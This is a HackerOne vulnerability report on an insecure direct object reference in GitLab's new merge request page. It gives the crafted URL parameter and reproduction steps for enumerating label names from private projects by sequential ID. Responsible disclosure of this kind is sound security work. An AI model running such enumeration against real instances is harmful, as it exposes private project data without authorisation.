Get all labels from gitlab IDOR- new Merge requests endpoint
HackerOne report #507113 by ashish_r_padelkar
on 2019-03-09, assigned to hackerjuan
:
Summary:
It is possible to get all label names from gitlab by enumerating through label IDs irrespective of project visibility settings. I.e you can get names of labels which belongs to private projects too.
Description:
When you create a new merge request, the url looks like below
https://gitlab.com/<UserName>/<ProjectName>/merge_requests/new?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=<ID>&merge_request%5Bsource_branch%5D=master1&merge_request%5Btarget_project_id%5D=<ID>&merge_request%5Btarget_branch%5D=master
Now if you append the parameter &merge_request[label_ids][]=<LabelID>
in above request, the name of the label will be populated in Labels
dropdown in UI
So the final request would be
https://gitlab.com/<UserName>/<ProjectName>/merge_requests/new?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=<ID>&merge_request%5Bsource_branch%5D=master1&merge_request%5Btarget_project_id%5D=<ID>&merge_request%5Btarget_branch%5D=master&merge_request[label_ids][]=<LabelID>
Steps To Reproduce:
-
As a project member of any project with capabilities of creating merge requests, click on creating new merge request
-
You will be navigated to the url something like below
https://gitlab.com/<UserName>/<ProjectName>/merge_requests/new?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=<ID>&merge_request%5Bsource_branch%5D=master1&merge_request%5Btarget_project_id%5D=<ID>&merge_request%5Btarget_branch%5D=master
-
Append
&merge_request[label_ids][]=<LabelID>
in above url -
Name of the label will be populated in the
Labels
dropdown in UI. -
As this is sequential ID, we can enumerate all gitlab labels irrespective of project visibility settings
Regards,
Ashish
Impact
Get all Labels from gitlab IDOR irrespective of project visibility settings at merge request endpoint